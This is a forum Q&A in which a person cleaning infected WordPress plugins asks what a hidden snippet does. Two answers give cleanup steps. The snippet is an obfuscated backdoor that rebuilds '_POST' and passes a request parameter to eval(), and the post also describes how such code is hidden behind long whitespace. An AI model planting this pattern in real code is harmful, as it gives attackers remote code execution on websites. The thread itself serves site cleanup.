Wordpress malicious code, what does it actually do?

Question

So, today I clean up some of my client's site and found that there are a lot of neat malicious code on a lot of wordpress plugin.

Some are very neat (=D), but one of the best is the old trick of putting a lot of indent after <?php and putting the malicious code before ending it with ?> and opening another <?php at the end of the line so it looks like there is only one <?php .

Now, what I am asking is what will that malicious code do? This is one of the sample code I found:

$qV="stop_";
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q571d85'])) {
eval(${$s20}['q571d85']);
}

Above code should've produced an error ( $qv is not array), but it isn't. Anyone can explain what is it?

Answer 1

1) Install new wordpress.(New) 2) Download All Plugin (new) 3) Connect Old Database 4) Add All uploads Media 5) check your theam &template and Js File.

Find and Replace

 $qV="stop_";
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q571d85'])) {
eval(${$s20}['q571d85']);
}

Answer 2

first of all Check Your Wordpress Version and download same version from wordpress.org. Replace your wp-admin, wp-include and root files with latest downloaded files. Once you will do this malware only remaining in you plugins and theme. So next just upgrade your plugins with latest one and it will finish from plugins as well.

for checking in them you can scan with any antivirus, and it will find the malware code. Than you can delete manually its almost same code in all files.

Hope this will help!